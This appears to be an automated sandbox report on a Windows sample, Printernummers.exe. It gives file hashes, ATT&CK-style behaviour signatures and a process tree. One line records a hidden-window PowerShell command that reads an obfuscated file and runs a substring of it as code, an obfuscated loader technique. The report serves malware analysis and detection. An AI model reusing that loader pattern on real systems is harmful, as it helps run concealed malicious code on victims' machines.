Analysis
-
max time kernel
94s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 12:41
Static task
static1
Behavioral task
behavioral1
Sample
Printernummers.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Printernummers.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20241023-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
Printernummers.exe
-
Size
770KB
-
MD5
5e2ff1914fc1f8ebadf282f4096d6fc8
-
SHA1
77d61bdf0ce63eed5324b56623b878fc3dc79890
-
SHA256
f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d
-
SHA512
e70121837b94ba002dc2093afcebed4ec1d3f90d46d1466fe66e4f0bd16a9426d58547946ef7f420c937017deb650c5705c7792f6047de68918f018b7ec4d916
-
SSDEEP
12288:6DGZKmormA1FvvLR3x8rqDFXlo3KsAYzjDCwonXnWMIk2CyLuuOSFBPpJh/gpcXF:4mor/1t8uTooHNnXWMIdCkOqXPgKP9
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1904 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 376 Printernummers.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\unthick.ini Printernummers.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Printernummers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1904 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 376 wrote to memory of 1904 376 Printernummers.exe 30 PID 376 wrote to memory of 1904 376 Printernummers.exe 30 PID 376 wrote to memory of 1904 376 Printernummers.exe 30 PID 376 wrote to memory of 1904 376 Printernummers.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\Printernummers.exe"C:\Users\Admin\AppData\Local\Temp\Printernummers.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\Admin\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
33B
MD5e23f52386361095bdb7040b09e2216ae
SHA191f31dd82ab80140db621b6dce0b9b5d6b568723
SHA25636467321184a76e0fea592d2896856a37ec18fc8480de66f05d719d93b39d070
SHA51219d18de54b3466f0d283271786b3b308c3be07f21174c46563c4c16292716c52f2c1b85f416ed77143ea6847bfc4c4c37f22296948eac47499276b181f129b9c
-
Filesize
6KB
MD51b0e41f60564cccccd71347d01a7c397
SHA1b1bddd97765e9c249ba239e9c95ab32368098e02
SHA25613ebc725f3f236e1914fe5288ad6413798ad99bef38bfe9c8c898181238e8a10
SHA512b6d7925cdff358992b2682cf1485227204ce3868c981c47778dd6da32057a595caa933d8242c8d7090b0c54110d45fa8f935a1b4eec1e318d89cc0e44b115785